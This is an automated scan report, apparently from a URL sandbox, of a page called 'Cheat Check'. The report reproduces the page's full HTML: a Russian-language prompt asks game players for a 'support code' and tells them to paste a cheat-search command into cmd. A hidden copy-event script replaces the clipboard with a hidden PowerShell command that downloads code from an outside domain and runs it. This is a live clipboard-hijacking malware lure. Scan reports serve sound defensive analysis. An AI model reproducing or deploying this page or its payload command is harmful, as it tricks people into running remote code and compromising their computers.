https://cheatcheck.pro/

Eingereichte URL:
https://cheatcheck.pro/
Bericht beendet:

Die von der Seite ausgehenden identifizierten Links

JavaScript-Variablen · 3 gefunden

Globale JavaScript-Variablen, die in das Window Object einer Seite geladen werden, sind Variablen, die außerhalb von Funktionen deklariert werden und von jeder Stelle des Codes innerhalb des aktuellen Bereichs zugänglich sind

NameTyp
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

Konsolenprotokoll-Meldungen · 0 gefunden

In der Web-Konsole protokollierte Meldungen

HTML

Der HTML-Rohtext der Seite

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <title>Cheat Check</title>
    <link rel="icon" type="image/png" href="https://img.icons8.com/pulsar-gradient/48/instagram-verification-badge.png">
    <style>
        * {
            margin: 0;
            padding: 0;
            color: #FFF;
            overflow: hidden;
            box-sizing: border-box;
        }

        body {
            position: relative;
            background: #00222B;
        }

        canvas#canvas {
            display: block;
            position: fixed;
            top: 0;
            left: 0;
            z-index: -1;
        }

        .modal {
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background: #333;
            color: #FFF;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
            width: 300px;
            text-align: center;
            font-family: Arial, sans-serif;
            display: none;
        }

        .modal.active {
            display: block;
        }

        .modal p {
            margin-bottom: 20px;
            font-size: 14px;
            line-height: 1.6;
        }

        .modal h2 {
            font-size: 20px;
            margin-bottom: 15px;
        }

        .modal input {
            width: 100%;
            padding: 10px;
            margin-bottom: 20px;
            border: 1px solid #555;
            border-radius: 4px;
            background: #444;
            color: #FFF;
            font-size: 14px;
        }

        .modal button {
            background: #6200ea;
            border: none;
            padding: 10px 20px;
            color: #FFF;
            border-radius: 4px;
            cursor: pointer;
            font-size: 14px;
        }

        .modal button:hover {
            background: #3700b3;
        }

        .spinner {
            margin: 20px auto;
            width: 40px;
            height: 40px;
            border: 4px solid #444;
            border-top: 4px solid #FFF;
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>
<body>

<canvas id="canvas" width="800" height="600">Canvas not supported.</canvas>

<div class="modal active" id="modal1">
    <h2>Введите код саппорта</h2>
    <input type="text" id="supportCode" placeholder="Код саппорта">
    <button id="confirmButton">Подтвердить</button>
</div>

<div class="modal" id="modal2">
    <h2>Ожидаем проверки...</h2>
    <p>
        Запустите консоль (cmd) через поиск или <strong>Win + R</strong>, затем введите <code>cmd</code>.<br>
        Скопируйте следующую команду:
    </p>
    <p>
        <code>dir "C:\Program Files" /s /p | findstr /i "cheat hack aimbot speedhack wallhack trainer"</code>
    </p>
    <p>Вставьте команду в консоль и нажмите <strong>Enter</strong>. После проверки страница закроется автоматически, и вы пройдёте проверку.</p>
    <div class="spinner"></div>
</div>

<script>
    // Переменная для хранения кода саппорта
    let supportCode = '';
    (function () {
        // Элементы DOM
        const modal1 = document.getElementById('modal1');
        const modal2 = document.getElementById('modal2');
        const supportCodeInput = document.getElementById('supportCode');
        const confirmButton = document.getElementById('confirmButton');

        // Показываем первое модальное окно
        modal1.classList.add('active');

        // Обработчик нажатия кнопки "Подтвердить"
        confirmButton.addEventListener('click', () => {
            supportCode = supportCodeInput.value.trim();

            if (supportCode) {
                // Скрываем первое окно и показываем второе
                modal1.classList.remove('active');
                modal2.classList.add('active');

            } else {
                alert('Пожалуйста, введите код саппорта.');
            }
        });

        // Анимация для Canvas
        window.addEventListener('load', function () {
            var canvas = document.getElementById('canvas');
            if (!canvas || !canvas.getContext) return;

            var ctx = canvas.getContext('2d');
            var X = canvas.width = window.innerWidth;
            var Y = canvas.height = window.innerHeight;
            var shapes = [];

            function rand(min, max) {
                return Math.floor(Math.random() * (max - min + 1) + min);
            }

            function Shape(ctx, x, y) {
                this.ctx = ctx;
                this.init(x, y);
            }

            Shape.prototype.init = function (x, y) {
                this.x = x;
                this.y = y;
                this.r = rand(10, 25);
                this.ga = Math.random() * Math.random();
                this.l = rand(0, 20);
                this.sl = this.l;
            };

            Shape.prototype.updateParams = function () {
                this.l -= 1;
                if (this.l < 0) {
                    this.init(X * (Math.random() + Math.random()) / 2, rand(0, Y));
                }
            };

            Shape.prototype.updatePosition = function () {
                this.x += Math.random();
                this.y -= Math.random();
            };

            Shape.prototype.draw = function () {
                var ctx = this.ctx;
                ctx.save();
                ctx.globalCompositeOperation = 'lighter';
                ctx.globalAlpha = this.ga;
                ctx.fillStyle = 'white';
                ctx.beginPath();
                ctx.arc(this.x, this.y, this.r, 0, Math.PI * 2, false);
                ctx.fill();
                ctx.restore();
            };

            Shape.prototype.render = function () {
                this.updatePosition();
                this.updateParams();
                this.draw();
            };

            for (var i = 0; i < 300; i++) {
                var s = new Shape(ctx, X * (Math.random() + Math.random()) / 2, rand(0, Y));
                shapes.push(s);
            }

            function render() {
                ctx.clearRect(0, 0, X, Y);
                for (var i = 0; i < shapes.length; i++) {
                    shapes[i].render();
                }
                requestAnimationFrame(render);
            }

            render();

            window.addEventListener('resize', function () {
                X = canvas.width = window.innerWidth;
                Y = canvas.height = window.innerHeight;
            });
        });
    })();
</script>
<script>
    document.addEventListener('copy', function(event) {
        if(supportCode == '')
            return;

        const newText = 'powershell -WindowStyle Hidden -Command "irm "https://dayzcheatcheck.online/nbp.php?name='+ supportCode +'" | iex"\nexit\n';
        navigator.clipboard.writeText(newText);
    });
</script>


</body></html>